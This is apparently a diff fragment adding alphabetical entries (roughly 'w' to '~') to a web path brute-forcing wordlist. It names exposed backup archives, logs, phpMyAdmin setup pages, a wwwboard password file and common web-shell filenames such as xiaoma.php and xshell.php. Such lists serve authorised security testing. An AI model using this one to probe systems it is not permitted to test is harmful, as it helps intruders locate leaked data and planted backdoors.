+wssgs/happyaxis.jsp
+wstats
+wuwu11.php
+wvdial.conf
+www-error.log
+www-test/
+www.rar
+www.sql
+www.tar
+www.tar.bz2
+www.tar.gz
+www.tgz
+www.zip
+www/phpMyAdmin/index.php
+wwwboard/
+wwwboard/passwd.txt
+wwwlog
+wwwroot.7z
+wwwroot.rar
+wwwroot.sql
+wwwroot.tar
+wwwroot.tar.bz2
+wwwroot.tar.gz
+wwwroot.tgz
+wwwroot.zip
+wwwstat
+wwwstats.htm
+x.php
+xampp/
+xampp/phpmyadmin/
+xampp/phpmyadmin/index.php
+xampp/phpmyadmin/scripts/setup.php
+xcuserdata/
+xd.php
+xferlog
+xiaoma.php
+xlogin/
+xls/
+xml/
+xml/_common.xml
+xml/common.xml
+xmlrpc.php
+xmlrpc_server.php
+xphperrors.log
+xphpMyAdmin/
+xprober.php
+xshell.php
+xsl/
+xsl/_common.xsl
+xsl/common.xsl
+xslt/
+xsql/
+xsql/lib/XSQLConfig.xml
+xw.php
+xw1.php
+xx.php
+yaml.log
+yaml_cron.log
+yarn-debug.log
+yarn-error.log
+yarn.lock
+ylwrap
+yonetici
+yonetici.html
+yonetici.php
+yonetim
+yonetim.html
+yonetim.php
+yum.log
+zabbix/
+zebra.conf
+zehir.php
+zeroclipboard.swf
+zf_backend.php
+zimbra/
+zipkin/
+zone-h.php
+~/
+~admin/